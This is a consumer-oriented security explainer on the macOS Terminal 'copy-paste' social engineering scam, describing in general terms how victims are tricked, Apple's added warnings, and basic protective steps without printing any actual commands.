The "copy-paste" scam is a social engineering attack that targets macOS users by tricking them into executing malicious commands within the Terminal application. By convincing victims to paste pre-written code, attackers can gain remote control over a computer, install malware, or steal sensitive data. Security researchers and Apple have identified this as a persistent threat, leading to recent system-level safeguards designed to limit the risk of unauthorized Terminal access.
How the Copy-Paste Scam Operates
The attack relies on psychological manipulation rather than a software vulnerability. Scammers typically contact victims through phishing emails, text messages, or deceptive forum posts, often posing as technical support representatives or software troubleshooters. According to security analysis from organizations like Malwarebytes, the goal is to guide the user to the macOS Terminal app—a powerful command-line interface—and instruct them to paste a specific string of text.

Once the command is executed, it can grant the attacker persistent remote access to the machine. Because Terminal operates with high-level system permissions, a malicious command can bypass standard graphical interface protections, allowing the attacker to bypass file permissions, log keystrokes, or exfiltrate private documents, financial information, and photos.
Why Terminal Is the Primary Target
The Terminal app is intended for developers and system administrators to manage macOS via text-based instructions. Because most average users do not interact with Terminal, they are less likely to recognize when a command is dangerous.
The mechanism often involves "indirect prompt injection," where a chatbot or a malicious website provides a command that looks like a legitimate fix for a technical issue. Once pasted, these commands can:
- Create a reverse shell, giving the attacker a direct connection to your Mac.
- Install hidden “persistence” scripts that relaunch the malware every time the computer boots.
- Lock the user out of their own files, effectively holding the machine for ransom.
How Apple Has Responded
In response to the rise of these social engineering tactics, Apple has updated macOS to include more robust warnings regarding Terminal usage. Recent versions of macOS include stricter prompts that require explicit user authorization before certain scripts or applications can interact with system-level files or external network connections.

These safeguards are intended to act as a "circuit breaker," forcing users to pause before executing code they do not fully understand. However, security experts emphasize that these protections do not replace user vigilance. If a command is granted permission by the user, the operating system will generally execute it as requested.
Protecting Your Mac from Terminal Attacks
To secure your device, follow these industry-standard security practices:
- Never paste code you don’t understand: If a support representative or an online forum suggests a Terminal command, verify it through official Apple documentation or reputable technical forums first.
- Verify the source: Apple support will never ask you to execute random commands in Terminal to “fix” your computer over a chat or phone call.
- Use standard tools: If you are experiencing technical issues, rely on the standard “System Settings” or the “Activity Monitor” rather than unknown Terminal scripts.
- Enable FileVault: Ensure your disk is encrypted to prevent unauthorized access to your data at the hardware level.
If you suspect you have already executed a malicious command, disconnect your Mac from the internet immediately to sever the attacker’s remote connection. Then, consult with an authorized Apple service provider or a professional security firm to audit your system for persistent malware or unauthorized user accounts.